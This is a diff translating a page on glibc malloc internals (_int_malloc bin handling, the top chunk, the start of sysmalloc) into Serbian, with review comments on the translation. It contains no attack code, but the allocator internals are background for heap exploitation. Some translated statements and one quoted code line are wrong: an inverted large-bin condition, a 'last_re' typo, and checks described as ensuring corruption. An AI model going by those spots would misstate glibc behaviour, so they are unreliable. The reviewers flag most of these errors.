("malloc(): mismatching next->prev_size (unsorted)"); +if (__glibc_unlikely (bck->fd != victim) +|| __glibc_unlikely (victim->fd != unsorted_chunks (av))) +malloc_printerr ("malloc(): unsorted double linked list corrupted"); +if (__glibc_unlikely (prev_inuse (next))) +malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)"); ``` -
-#### if `in_smallbin_range` +#### ako `in_smallbin_range` -If the chunk is bigger than the requested size use it, and set the rest of the chunk space into the unsorted list and update the `last_remainder` with it. +Ako je deo veći od tražene veličine, iskoristite ga i postavite ostatak prostora dela u nesortiranu listu i ažurirajte `last_remainder` sa njim.
-_int_malloc unsorted bin in_smallbin_range - +_int_malloc nesortirana kofa in_smallbin_range ```c // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4090C11-L4124C14 /* - If a small request, try to use last remainder if it is the - only chunk in unsorted bin. This helps promote locality for - runs of consecutive small requests. This is the only - exception to best-fit, and applies only when there is - no exact fit for a small chunk. - */ +If a small request, try to use last remainder if it is the +only chunk in unsorted bin. This helps promote locality for +runs of consecutive small requests. This is the only +exception to best-fit, and applies only when there is +no exact fit for a small chunk. +*/ - if (in_smallbin_range (nb) && - bck == unsorted_chunks (av) && - victim == av->last_remainder && - (unsigned long) (size) > (unsigned long) (nb + MINSIZE)) - { - /* split and reattach remainder */ - remainder_size = size - nb; - remainder = chunk_at_offset (victim, nb); - unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder; - av->last_remainder = remainder; - remainder->bk = remainder->fd = unsorted_chunks (av); - if (!in_smallbin_range (remainder_size)) - { - remainder->fd_nextsize = NULL; - remainder->bk_nextsize = NULL; - } +if (in_smallbin_range (nb) && +bck == unsorted_chunks (av) && +victim == av->last_remainder && +(unsigned long) (size) > (unsigned long) (nb + MINSIZE)) +{ +/* split and reattach remainder */ +remainder_size = size - nb; +remainder = chunk_at_offset (victim, nb); +unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder; +av->last_remainder = remainder; +remainder->bk = remainder->fd = unsorted_chunks (av); +if (!in_smallbin_range (remainder_size)) +{ +remainder->fd_nextsize = NULL; +remainder->bk_nextsize = NULL; +} - set_head (victim, nb | PREV_INUSE | - (av != &main_arena ? 
NON_MAIN_ARENA : 0)); - set_head (remainder, remainder_size | PREV_INUSE); - set_foot (remainder, remainder_size); +set_head (victim, nb | PREV_INUSE | +(av != &main_arena ? NON_MAIN_ARENA : 0)); +set_head (remainder, remainder_size | PREV_INUSE); +set_foot (remainder, remainder_size); - check_malloced_chunk (av, victim, nb); - void *p = chunk2mem (victim); - alloc_perturb (p, bytes); - return p; - } +check_malloced_chunk (av, victim, nb); +void *p = chunk2mem (victim); +alloc_perturb (p, bytes); +return p; +} ``` -
-If this was successful, return the chunk ant it's over, if not, continue executing the function... +Ako je ovo uspešno, vrati deo i to je to, ako ne, nastavi sa izvršavanjem funkcije... -#### if equal size +#### ako je veličina jednaka -Continue removing the chunk from the bin, in case the requested size is exactly the one of the chunk: +Nastavi sa uklanjanjem dela iz bin-a, u slučaju da je tražena veličina tačno veličina dela: -- If the tcache is not filled, add it to the tcache and continue indicating that there is a tcache chunk that could be used -- If tcache is full, just use it returning it +- Ako tcache nije popunjen, dodaj ga u tcache i nastavi ukazujući da postoji tcache deo koji bi mogao biti korišćen +- Ako je tcache pun, jednostavno ga koristi vraćajući ga
-_int_malloc unsorted bin equal size - +_int_malloc nesortiran bin jednaka veličina ```c // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4126C11-L4157C14 /* remove from unsorted list */ - unsorted_chunks (av)->bk = bck; - bck->fd = unsorted_chunks (av); +unsorted_chunks (av)->bk = bck; +bck->fd = unsorted_chunks (av); - /* Take now instead of binning if exact fit */ +/* Take now instead of binning if exact fit */ - if (size == nb) - { - set_inuse_bit_at_offset (victim, size); - if (av != &main_arena) - set_non_main_arena (victim); +if (size == nb) +{ +set_inuse_bit_at_offset (victim, size); +if (av != &main_arena) +set_non_main_arena (victim); #if USE_TCACHE - /* Fill cache first, return to user only if cache fills. - We may return one of these chunks later. */ - if (tcache_nb > 0 - && tcache->counts[tc_idx] < mp_.tcache_count) - { - tcache_put (victim, tc_idx); - return_cached = 1; - continue; - } - else - { +/* Fill cache first, return to user only if cache fills. +We may return one of these chunks later. */ +if (tcache_nb > 0 +&& tcache->counts[tc_idx] < mp_.tcache_count) +{ +tcache_put (victim, tc_idx); +return_cached = 1; +continue; +} +else +{ #endif - check_malloced_chunk (av, victim, nb); - void *p = chunk2mem (victim); - alloc_perturb (p, bytes); - return p; +check_malloced_chunk (av, victim, nb); +void *p = chunk2mem (victim); +alloc_perturb (p, bytes); +return p; #if USE_TCACHE - } +} #endif - } +} ``` -
-If chunk not returned or added to tcache, continue with the code... +Ako deo nije vraćen ili dodat u tcache, nastavite sa kodom... -#### place chunk in a bin +#### stavite deo u kantu -Store the checked chunk in the small bin or in the large bin according to the size of the chunk (keeping the large bin properly organized). +Skladištite provereni deo u maloj kanti ili u velikoj kanti u zavisnosti od veličine dela (držeći veliku kantu pravilno organizovanom). -There are security checks being performed to make sure both large bin doubled linked list are corrupted: +Vrše se bezbednosne provere kako bi se osiguralo da su obe velike kante dvostruko povezane liste oštećene: -- If `fwd->bk_nextsize->fd_nextsize != fwd`: `malloc(): largebin double linked list corrupted (nextsize)` -- If `fwd->bk->fd != fwd`: `malloc(): largebin double linked list corrupted (bk)` +- Ako `fwd->bk_nextsize->fd_nextsize != fwd`: `malloc(): largebin double linked list corrupted (nextsize)` +- Ako `fwd->bk->fd != fwd`: `malloc(): largebin double linked list corrupted (bk)`
-_int_malloc place chunk in a bin - +_int_malloc stavite deo u kantu ```c /* place chunk in bin */ - if (in_smallbin_range (size)) - { - victim_index = smallbin_index (size); - bck = bin_at (av, victim_index); - fwd = bck->fd; - } - else - { - victim_index = largebin_index (size); - bck = bin_at (av, victim_index); - fwd = bck->fd; +if (in_smallbin_range (size)) +{ +victim_index = smallbin_index (size); +bck = bin_at (av, victim_index); +fwd = bck->fd; +} +else +{ +victim_index = largebin_index (size); +bck = bin_at (av, victim_index); +fwd = bck->fd; - /* maintain large bins in sorted order */ - if (fwd != bck) - { - /* Or with inuse bit to speed comparisons */ - size |= PREV_INUSE; - /* if smaller than smallest, bypass loop below */ - assert (chunk_main_arena (bck->bk)); - if ((unsigned long) (size) - < (unsigned long) chunksize_nomask (bck->bk)) - { - fwd = bck; - bck = bck->bk; +/* maintain large bins in sorted order */ +if (fwd != bck) +{ +/* Or with inuse bit to speed comparisons */ +size |= PREV_INUSE; +/* if smaller than smallest, bypass loop below */ +assert (chunk_main_arena (bck->bk)); +if ((unsigned long) (size) +< (unsigned long) chunksize_nomask (bck->bk)) +{ +fwd = bck; +bck = bck->bk; - victim->fd_nextsize = fwd->fd; - victim->bk_nextsize = fwd->fd->bk_nextsize; - fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; - } - else - { - assert (chunk_main_arena (fwd)); - while ((unsigned long) size < chunksize_nomask (fwd)) - { - fwd = fwd->fd_nextsize; - assert (chunk_main_arena (fwd)); - } +victim->fd_nextsize = fwd->fd; +victim->bk_nextsize = fwd->fd->bk_nextsize; +fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; +} +else +{ +assert (chunk_main_arena (fwd)); +while ((unsigned long) size < chunksize_nomask (fwd)) +{ +fwd = fwd->fd_nextsize; +assert (chunk_main_arena (fwd)); +} - if ((unsigned long) size - == (unsigned long) chunksize_nomask (fwd)) - /* Always insert in the second position. 
*/ - fwd = fwd->fd; - else - { - victim->fd_nextsize = fwd; - victim->bk_nextsize = fwd->bk_nextsize; - if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd)) - malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)"); - fwd->bk_nextsize = victim; - victim->bk_nextsize->fd_nextsize = victim; - } - bck = fwd->bk; - if (bck->fd != fwd) - malloc_printerr ("malloc(): largebin double linked list corrupted (bk)"); - } - } - else - victim->fd_nextsize = victim->bk_nextsize = victim; - } +if ((unsigned long) size +== (unsigned long) chunksize_nomask (fwd)) +/* Always insert in the second position. */ +fwd = fwd->fd; +else +{ +victim->fd_nextsize = fwd; +victim->bk_nextsize = fwd->bk_nextsize; +if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd)) +malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)"); +fwd->bk_nextsize = victim; +victim->bk_nextsize->fd_nextsize = victim; +} +bck = fwd->bk; +if (bck->fd != fwd) +malloc_printerr ("malloc(): largebin double linked list corrupted (bk)"); +} +} +else +victim->fd_nextsize = victim->bk_nextsize = victim; +} - mark_bin (av, victim_index); - victim->bk = bck; - victim->fd = fwd; - fwd->bk = victim; - bck->fd = victim; +mark_bin (av, victim_index); +victim->bk = bck; +victim->fd = fwd; +fwd->bk = victim; +bck->fd = victim; ``` -
-#### `_int_malloc` limits +#### `_int_malloc` ograničenja -At this point, if some chunk was stored in the tcache that can be used and the limit is reached, just **return a tcache chunk**. +U ovom trenutku, ako je neki deo sačuvan u tcache koji se može koristiti i limit je dostignut, samo **vrati tcache deo**. -Moreover, if **MAX_ITERS** is reached, break from the loop for and get a chunk in a different way (top chunk). +Štaviše, ako je dostignut **MAX_ITERS**, prekinite petlju i dobijte deo na drugačiji način (top deo). -If `return_cached` was set, just return a chunk from the tcache to avoid larger searches. +Ako je `return_cached` postavljen, samo vratite deo iz tcache da biste izbegli veće pretrage.
-_int_malloc limits - +_int_malloc ograničenja ```c // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4227C1-L4250C7 #if USE_TCACHE - /* If we've processed as many chunks as we're allowed while - filling the cache, return one of the cached ones. */ - ++tcache_unsorted_count; - if (return_cached - && mp_.tcache_unsorted_limit > 0 - && tcache_unsorted_count > mp_.tcache_unsorted_limit) - { - return tcache_get (tc_idx); - } +/* If we've processed as many chunks as we're allowed while +filling the cache, return one of the cached ones. */ +++tcache_unsorted_count; +if (return_cached +&& mp_.tcache_unsorted_limit > 0 +&& tcache_unsorted_count > mp_.tcache_unsorted_limit) +{ +return tcache_get (tc_idx); +} #endif #define MAX_ITERS 10000 - if (++iters >= MAX_ITERS) - break; - } +if (++iters >= MAX_ITERS) +break; +} #if USE_TCACHE - /* If all the small chunks we found ended up cached, return one now. */ - if (return_cached) - { - return tcache_get (tc_idx); - } +/* If all the small chunks we found ended up cached, return one now. */ +if (return_cached) +{ +return tcache_get (tc_idx); +} #endif ``` -
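Review bot: grammatical person is mixed across three consecutive sentences: `samo **vrati** tcache deo` (2nd singular) against `prekinite petlju` and `vratite deo` (2nd plural); the English is descriptive, so third person (`vraća se deo iz tcache-a`, `petlja se prekida`) fits all three. The first sentence also misstates the condition: the early return fires only when the tunable is set, as `mp_.tcache_unsorted_limit > 0 && tcache_unsorted_count > mp_.tcache_unsorted_limit` shows, and `tcache_unsorted_count` counts unsorted chunks processed in the loop, not chunks stored in tcache; `MAX_ITERS` (10000) by contrast always applies. And `dobijte deo na drugačiji način (top deo)` skips a step: breaking out of the loop falls through to the large-bin scans that follow, not straight to the top chunk.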
-If limits not reached, continue with the code... +Ako granice nisu dostignute, nastavite sa kodom... -### Large Bin (by index) +### Velika kesa (po indeksu) -If the request is large (not in small bin) and we haven't yet returned any chunk, get the **index** of the requested size in the **large bin**, check if **not empty** of if the **biggest chunk in this bin is bigger** than the requested size and in that case find the **smallest chunk that can be used** for the requested size. +Ako je zahtev velik (nije u maloj kesi) i još nismo vratili nijedan deo, uzmite **indeks** tražene veličine u **velikoj kesi**, proverite da li je **prazna** ili ako je **najveći deo u ovoj kesi veći** od tražene veličine i u tom slučaju pronađite **najmanji deo koji se može koristiti** za traženu veličinu. -If the reminder space from the finally used chunk can be a new chunk, add it to the unsorted bin and the lsast_reminder is updated. +Ako prostor koji ostaje od konačno korišćenog dela može biti novi deo, dodajte ga u neuređenu kesu i lsast_reminder se ažurira. -A security check is made when adding the reminder to the unsorted bin: +Bezbednosna provera se vrši prilikom dodavanja ostatka u neuređenu kesu: -- `bck->fd-> bk != bck`: `malloc(): corrupted unsorted chunks` +- `bck->fd-> bk != bck`: `malloc(): oštećeni neuređeni delovi`
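Review bot: `proverite da li je **prazna**` inverts the source: the English says the scan runs only if the bin is **not empty** and its largest chunk is at least the requested size (the code reads `if ((victim = first (bin)) != bin && (unsigned long) chunksize_nomask (victim) >= (unsigned long) (nb))`), so this should be `proverite da li **nije prazna** i da li je najveći deo u njoj veći ili jednak traženoj veličini`. The bullet must keep the literal glibc string `malloc(): corrupted unsorted chunks`, not `malloc(): oštećeni neuređeni delovi`; readers grep crash output for the English text. Two typos were carried over from the `-` side and should be fixed while the line is being rewritten: `lsast_reminder` and `reminder` are `last_remainder` and `remainder`. Finally, the claim that `last_remainder` is updated on this path is wrong: the by-index large-bin code in the block that follows never assigns `av->last_remainder` (only the next-bigger-bin path does, under `if (in_smallbin_range (nb))`), so that clause should be dropped.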
-_int_malloc Large bin (by index) - +_int_malloc Velika kesa (po indeksu) ```c // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4252C7-L4317C10 /* - If a large request, scan through the chunks of current bin in - sorted order to find smallest that fits. Use the skip list for this. - */ +If a large request, scan through the chunks of current bin in +sorted order to find smallest that fits. Use the skip list for this. +*/ - if (!in_smallbin_range (nb)) - { - bin = bin_at (av, idx); +if (!in_smallbin_range (nb)) +{ +bin = bin_at (av, idx); - /* skip scan if empty or largest chunk is too small */ - if ((victim = first (bin)) != bin - && (unsigned long) chunksize_nomask (victim) - >= (unsigned long) (nb)) - { - victim = victim->bk_nextsize; - while (((unsigned long) (size = chunksize (victim)) < - (unsigned long) (nb))) - victim = victim->bk_nextsize; +/* skip scan if empty or largest chunk is too small */ +if ((victim = first (bin)) != bin +&& (unsigned long) chunksize_nomask (victim) +>= (unsigned long) (nb)) +{ +victim = victim->bk_nextsize; +while (((unsigned long) (size = chunksize (victim)) < +(unsigned long) (nb))) +victim = victim->bk_nextsize; - /* Avoid removing the first entry for a size so that the skip - list does not have to be rerouted. */ - if (victim != last (bin) - && chunksize_nomask (victim) - == chunksize_nomask (victim->fd)) - victim = victim->fd; +/* Avoid removing the first entry for a size so that the skip +list does not have to be rerouted. 
*/ +if (victim != last (bin) +&& chunksize_nomask (victim) +== chunksize_nomask (victim->fd)) +victim = victim->fd; - remainder_size = size - nb; - unlink_chunk (av, victim); +remainder_size = size - nb; +unlink_chunk (av, victim); - /* Exhaust */ - if (remainder_size < MINSIZE) - { - set_inuse_bit_at_offset (victim, size); - if (av != &main_arena) - set_non_main_arena (victim); - } - /* Split */ - else - { - remainder = chunk_at_offset (victim, nb); - /* We cannot assume the unsorted list is empty and therefore - have to perform a complete insert here. */ - bck = unsorted_chunks (av); - fwd = bck->fd; - if (__glibc_unlikely (fwd->bk != bck)) - malloc_printerr ("malloc(): corrupted unsorted chunks"); - last_re->bk = bck; - remainder->fd = fwd; - bck->fd = remainder; - fwd->bk = remainder; - if (!in_smallbin_range (remainder_size)) - { - remainder->fd_nextsize = NULL; - remainder->bk_nextsize = NULL; - } - set_head (victim, nb | PREV_INUSE | - (av != &main_arena ? NON_MAIN_ARENA : 0)); - set_head (remainder, remainder_size | PREV_INUSE); - set_foot (remainder, remainder_size); - } - check_malloced_chunk (av, victim, nb); - void *p = chunk2mem (victim); - alloc_perturb (p, bytes); - return p; - } - } +/* Exhaust */ +if (remainder_size < MINSIZE) +{ +set_inuse_bit_at_offset (victim, size); +if (av != &main_arena) +set_non_main_arena (victim); +} +/* Split */ +else +{ +remainder = chunk_at_offset (victim, nb); +/* We cannot assume the unsorted list is empty and therefore +have to perform a complete insert here. */ +bck = unsorted_chunks (av); +fwd = bck->fd; +if (__glibc_unlikely (fwd->bk != bck)) +malloc_printerr ("malloc(): corrupted unsorted chunks"); +last_re->bk = bck; +remainder->fd = fwd; +bck->fd = remainder; +fwd->bk = remainder; +if (!in_smallbin_range (remainder_size)) +{ +remainder->fd_nextsize = NULL; +remainder->bk_nextsize = NULL; +} +set_head (victim, nb | PREV_INUSE | +(av != &main_arena ? 
NON_MAIN_ARENA : 0)); +set_head (remainder, remainder_size | PREV_INUSE); +set_foot (remainder, remainder_size); +} +check_malloced_chunk (av, victim, nb); +void *p = chunk2mem (victim); +alloc_perturb (p, bytes); +return p; +} +} ``` -
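Review bot: `+last_re->bk = bck;` is a typo copied verbatim from the `-` side; `last_re` is not declared anywhere on this page and the glibc line is `remainder->bk = bck;`, exactly as the same insert sequence appears in the next-bigger-bin block (`remainder->bk = bck; remainder->fd = fwd; bck->fd = remainder;`). Since the line is being rewritten anyway, fix it here. The retained source link `https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4252C7-L4317C10` points at `master`, so the `#L...` range will drift as malloc.c changes; the sysmalloc blocks later in this patch pin a commit (`f942a732d37a96217ef828116ebe64a644db18d7`), which is the convention to follow for the `_int_malloc` blocks too.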
-If a chunk isn't found suitable for this, continue +Ako se deo ne pronađe kao pogodan za ovo, nastavite -### Large Bin (next bigger) +### Velika kesa (sledeća veća) -If in the exact large bin there wasn't any chunk that could be used, start looping through all the next large bin (starting y the immediately larger) until one is found (if any). +Ako u tačnoj velikoj kesi nije bilo nijednog dela koji bi mogao da se koristi, počnite da prolazite kroz sve sledeće velike kese (počinjajući od odmah veće) dok se ne pronađe jedan (ako ih ima). -The reminder of the split chunk is added in the unsorted bin, last_reminder is updated and the same security check is performed: +Ostatak podeljenog dela se dodaje u nesortiranu kesu, last_reminder se ažurira i vrši se ista provera bezbednosti: -- `bck->fd-> bk != bck`: `malloc(): corrupted unsorted chunks2` +- `bck->fd-> bk != bck`: `malloc(): oštećeni nesortirani delovi2`
-_int_malloc Large bin (next bigger) - +_int_malloc Velika kesa (sledeća veća) ```c // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4319C7-L4425C10 /* - Search for a chunk by scanning bins, starting with next largest - bin. This search is strictly by best-fit; i.e., the smallest - (with ties going to approximately the least recently used) chunk - that fits is selected. +Search for a chunk by scanning bins, starting with next largest +bin. This search is strictly by best-fit; i.e., the smallest +(with ties going to approximately the least recently used) chunk +that fits is selected. - The bitmap avoids needing to check that most blocks are nonempty. - The particular case of skipping all bins during warm-up phases - when no chunks have been returned yet is faster than it might look. - */ +The bitmap avoids needing to check that most blocks are nonempty. +The particular case of skipping all bins during warm-up phases +when no chunks have been returned yet is faster than it might look. +*/ - ++idx; - bin = bin_at (av, idx); - block = idx2block (idx); - map = av->binmap[block]; - bit = idx2bit (idx); +++idx; +bin = bin_at (av, idx); +block = idx2block (idx); +map = av->binmap[block]; +bit = idx2bit (idx); - for (;; ) - { - /* Skip rest of block if there are no more set bits in this block. */ - if (bit > map || bit == 0) - { - do - { - if (++block >= BINMAPSIZE) /* out of bins */ - goto use_top; - } - while ((map = av->binmap[block]) == 0); +for (;; ) +{ +/* Skip rest of block if there are no more set bits in this block. */ +if (bit > map || bit == 0) +{ +do +{ +if (++block >= BINMAPSIZE) /* out of bins */ +goto use_top; +} +while ((map = av->binmap[block]) == 0); - bin = bin_at (av, (block << BINMAPSHIFT)); - bit = 1; - } +bin = bin_at (av, (block << BINMAPSHIFT)); +bit = 1; +} - /* Advance to bin with set bit. There must be one. 
*/ - while ((bit & map) == 0) - { - bin = next_bin (bin); - bit <<= 1; - assert (bit != 0); - } +/* Advance to bin with set bit. There must be one. */ +while ((bit & map) == 0) +{ +bin = next_bin (bin); +bit <<= 1; +assert (bit != 0); +} - /* Inspect the bin. It is likely to be non-empty */ - victim = last (bin); +/* Inspect the bin. It is likely to be non-empty */ +victim = last (bin); - /* If a false alarm (empty bin), clear the bit. */ - if (victim == bin) - { - av->binmap[block] = map &= ~bit; /* Write through */ - bin = next_bin (bin); - bit <<= 1; - } +/* If a false alarm (empty bin), clear the bit. */ +if (victim == bin) +{ +av->binmap[block] = map &= ~bit; /* Write through */ +bin = next_bin (bin); +bit <<= 1; +} - else - { - size = chunksize (victim); +else +{ +size = chunksize (victim); - /* We know the first chunk in this bin is big enough to use. */ - assert ((unsigned long) (size) >= (unsigned long) (nb)); +/* We know the first chunk in this bin is big enough to use. */ +assert ((unsigned long) (size) >= (unsigned long) (nb)); - remainder_size = size - nb; +remainder_size = size - nb; - /* unlink */ - unlink_chunk (av, victim); +/* unlink */ +unlink_chunk (av, victim); - /* Exhaust */ - if (remainder_size < MINSIZE) - { - set_inuse_bit_at_offset (victim, size); - if (av != &main_arena) - set_non_main_arena (victim); - } +/* Exhaust */ +if (remainder_size < MINSIZE) +{ +set_inuse_bit_at_offset (victim, size); +if (av != &main_arena) +set_non_main_arena (victim); +} - /* Split */ - else - { - remainder = chunk_at_offset (victim, nb); +/* Split */ +else +{ +remainder = chunk_at_offset (victim, nb); - /* We cannot assume the unsorted list is empty and therefore - have to perform a complete insert here. 
*/ - bck = unsorted_chunks (av); - fwd = bck->fd; - if (__glibc_unlikely (fwd->bk != bck)) - malloc_printerr ("malloc(): corrupted unsorted chunks 2"); - remainder->bk = bck; - remainder->fd = fwd; - bck->fd = remainder; - fwd->bk = remainder; +/* We cannot assume the unsorted list is empty and therefore +have to perform a complete insert here. */ +bck = unsorted_chunks (av); +fwd = bck->fd; +if (__glibc_unlikely (fwd->bk != bck)) +malloc_printerr ("malloc(): corrupted unsorted chunks 2"); +remainder->bk = bck; +remainder->fd = fwd; +bck->fd = remainder; +fwd->bk = remainder; - /* advertise as last remainder */ - if (in_smallbin_range (nb)) - av->last_remainder = remainder; - if (!in_smallbin_range (remainder_size)) - { - remainder->fd_nextsize = NULL; - remainder->bk_nextsize = NULL; - } - set_head (victim, nb | PREV_INUSE | - (av != &main_arena ? NON_MAIN_ARENA : 0)); - set_head (remainder, remainder_size | PREV_INUSE); - set_foot (remainder, remainder_size); - } - check_malloced_chunk (av, victim, nb); - void *p = chunk2mem (victim); - alloc_perturb (p, bytes); - return p; - } - } +/* advertise as last remainder */ +if (in_smallbin_range (nb)) +av->last_remainder = remainder; +if (!in_smallbin_range (remainder_size)) +{ +remainder->fd_nextsize = NULL; +remainder->bk_nextsize = NULL; +} +set_head (victim, nb | PREV_INUSE | +(av != &main_arena ? NON_MAIN_ARENA : 0)); +set_head (remainder, remainder_size | PREV_INUSE); +set_foot (remainder, remainder_size); +} +check_malloced_chunk (av, victim, nb); +void *p = chunk2mem (victim); +alloc_perturb (p, bytes); +return p; +} +} ``` -
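Review bot: the bullet `malloc(): oštećeni nesortirani delovi2` translates a literal glibc error string and also fuses the `2` onto the last word; this very block shows the real text, `malloc_printerr ("malloc(): corrupted unsorted chunks 2");`, and the bullet should quote exactly that. `nesortirana kesa` here versus `neuređena kesa` in the previous section is a second rendering of "unsorted bin" within one patch. The prose is right that this path updates the last remainder, but only for small-bin-sized requests, as `if (in_smallbin_range (nb)) av->last_remainder = remainder;` shows; saying so would also correct the previous section, which claims the by-index path does it. `počnite da prolazite` is again an imperative where the English is descriptive.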
### Top Chunk -At this point, it's time to get a new chunk from the Top chunk (if big enough). +U ovom trenutku, vreme je da se dobije novi chunk iz Top chunk-a (ako je dovoljno velik). -It starts with a security check making sure that the size of the chunk size is not too big (corrupted): +Počinje sa bezbednosnom proverom kako bi se osiguralo da veličina chunk-a nije prevelika (korumpirana): - `chunksize(av->top) > av->system_mem`: `malloc(): corrupted top size` -Then, it'll use the top chunk space if it's large enough to create a chunk of the requested size.\ -If not, if there are fast chunks, consolidate them and try again.\ -Finally, if not enough space use `sysmalloc` to allocate enough size. +Zatim će koristiti prostor top chunk-a ako je dovoljno velik da kreira chunk tražene veličine.\ +Ako nije, ako postoje brzi chunk-ovi, konsolidujte ih i pokušajte ponovo.\ +Na kraju, ako nema dovoljno prostora, koristite `sysmalloc` da alocirate dovoljnu veličinu.
_int_malloc Top chunk - ```c use_top: - /* - If large enough, split off the chunk bordering the end of memory - (held in av->top). Note that this is in accord with the best-fit - search rule. In effect, av->top is treated as larger (and thus - less well fitting) than any other available chunk since it can - be extended to be as large as necessary (up to system - limitations). +/* +If large enough, split off the chunk bordering the end of memory +(held in av->top). Note that this is in accord with the best-fit +search rule. In effect, av->top is treated as larger (and thus +less well fitting) than any other available chunk since it can +be extended to be as large as necessary (up to system +limitations). - We require that av->top always exists (i.e., has size >= - MINSIZE) after initialization, so if it would otherwise be - exhausted by current request, it is replenished. (The main - reason for ensuring it exists is that we may need MINSIZE space - to put in fenceposts in sysmalloc.) - */ +We require that av->top always exists (i.e., has size >= +MINSIZE) after initialization, so if it would otherwise be +exhausted by current request, it is replenished. (The main +reason for ensuring it exists is that we may need MINSIZE space +to put in fenceposts in sysmalloc.) +*/ - victim = av->top; - size = chunksize (victim); +victim = av->top; +size = chunksize (victim); - if (__glibc_unlikely (size > av->system_mem)) - malloc_printerr ("malloc(): corrupted top size"); +if (__glibc_unlikely (size > av->system_mem)) +malloc_printerr ("malloc(): corrupted top size"); - if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) - { - remainder_size = size - nb; - remainder = chunk_at_offset (victim, nb); - av->top = remainder; - set_head (victim, nb | PREV_INUSE | - (av != &main_arena ? 
NON_MAIN_ARENA : 0)); - set_head (remainder, remainder_size | PREV_INUSE); +if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) +{ +remainder_size = size - nb; +remainder = chunk_at_offset (victim, nb); +av->top = remainder; +set_head (victim, nb | PREV_INUSE | +(av != &main_arena ? NON_MAIN_ARENA : 0)); +set_head (remainder, remainder_size | PREV_INUSE); - check_malloced_chunk (av, victim, nb); - void *p = chunk2mem (victim); - alloc_perturb (p, bytes); - return p; - } +check_malloced_chunk (av, victim, nb); +void *p = chunk2mem (victim); +alloc_perturb (p, bytes); +return p; +} - /* When we are using atomic ops to free fast chunks we can get - here for all block sizes. */ - else if (atomic_load_relaxed (&av->have_fastchunks)) - { - malloc_consolidate (av); - /* restore original bin index */ - if (in_smallbin_range (nb)) - idx = smallbin_index (nb); - else - idx = largebin_index (nb); - } +/* When we are using atomic ops to free fast chunks we can get +here for all block sizes. */ +else if (atomic_load_relaxed (&av->have_fastchunks)) +{ +malloc_consolidate (av); +/* restore original bin index */ +if (in_smallbin_range (nb)) +idx = smallbin_index (nb); +else +idx = largebin_index (nb); +} - /* - Otherwise, relay to handle system-dependent cases - */ - else - { - void *p = sysmalloc (nb, av); - if (p != NULL) - alloc_perturb (p, bytes); - return p; - } - } +/* +Otherwise, relay to handle system-dependent cases +*/ +else +{ +void *p = sysmalloc (nb, av); +if (p != NULL) +alloc_perturb (p, bytes); +return p; +} +} } ``` -
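Review bot: `korumpirana` in `nije prevelika (korumpirana)` is the wrong sense of "corrupted" (bribed); the rest of the patch uses `oštećen`, which is the right word for corrupted memory and should be used here too. This section also stops translating `chunk` / `Top chunk` while the sections above say `deo`; settle on one. The last paragraph should say what the code actually does after `malloc_consolidate (av)`: the bin index is recomputed (`/* restore original bin index */`, `idx = smallbin_index (nb)` or `largebin_index (nb)`) before the search loops again, and the trigger is `atomic_load_relaxed (&av->have_fastchunks)`, which the comment above it explains can be reached for any request size when fast chunks are freed with atomic ops. Stating that the top-chunk split requires `size >= nb + MINSIZE`, not just `size >= nb`, would also help, since the page elsewhere lists such conditions explicitly.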
## sysmalloc ### sysmalloc start -If arena is null or the requested size is too big (and there are mmaps left permitted) use `sysmalloc_mmap` to allocate space and return it. +Ako je arena null ili je tražena veličina prevelika (i preostali mmaps su dozvoljeni) koristi `sysmalloc_mmap` za alokaciju prostora i vraćanje istog.
sysmalloc start - ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2531 /* - sysmalloc handles malloc cases requiring more memory from the system. - On entry, it is assumed that av->top does not have enough - space to service request for nb bytes, thus requiring that av->top - be extended or replaced. - */ +sysmalloc handles malloc cases requiring more memory from the system. +On entry, it is assumed that av->top does not have enough +space to service request for nb bytes, thus requiring that av->top +be extended or replaced. +*/ - static void * +static void * sysmalloc (INTERNAL_SIZE_T nb, mstate av) { - mchunkptr old_top; /* incoming value of av->top */ - INTERNAL_SIZE_T old_size; /* its size */ - char *old_end; /* its end address */ +mchunkptr old_top; /* incoming value of av->top */ +INTERNAL_SIZE_T old_size; /* its size */ +char *old_end; /* its end address */ - long size; /* arg to first MORECORE or mmap call */ - char *brk; /* return value from MORECORE */ +long size; /* arg to first MORECORE or mmap call */ +char *brk; /* return value from MORECORE */ - long correction; /* arg to 2nd MORECORE call */ - char *snd_brk; /* 2nd return val */ +long correction; /* arg to 2nd MORECORE call */ +char *snd_brk; /* 2nd return val */ - INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */ - INTERNAL_SIZE_T end_misalign; /* partial page left at end of new space */ - char *aligned_brk; /* aligned offset into brk */ +INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */ +INTERNAL_SIZE_T end_misalign; /* partial page left at end of new space */ +char *aligned_brk; /* aligned offset into brk */ - mchunkptr p; /* the allocated/returned chunk */ - mchunkptr remainder; /* remainder from allocation */ - unsigned long remainder_size; /* its size */ +mchunkptr p; /* the allocated/returned chunk */ +mchunkptr remainder; /* remainder from allocation */ +unsigned long remainder_size; 
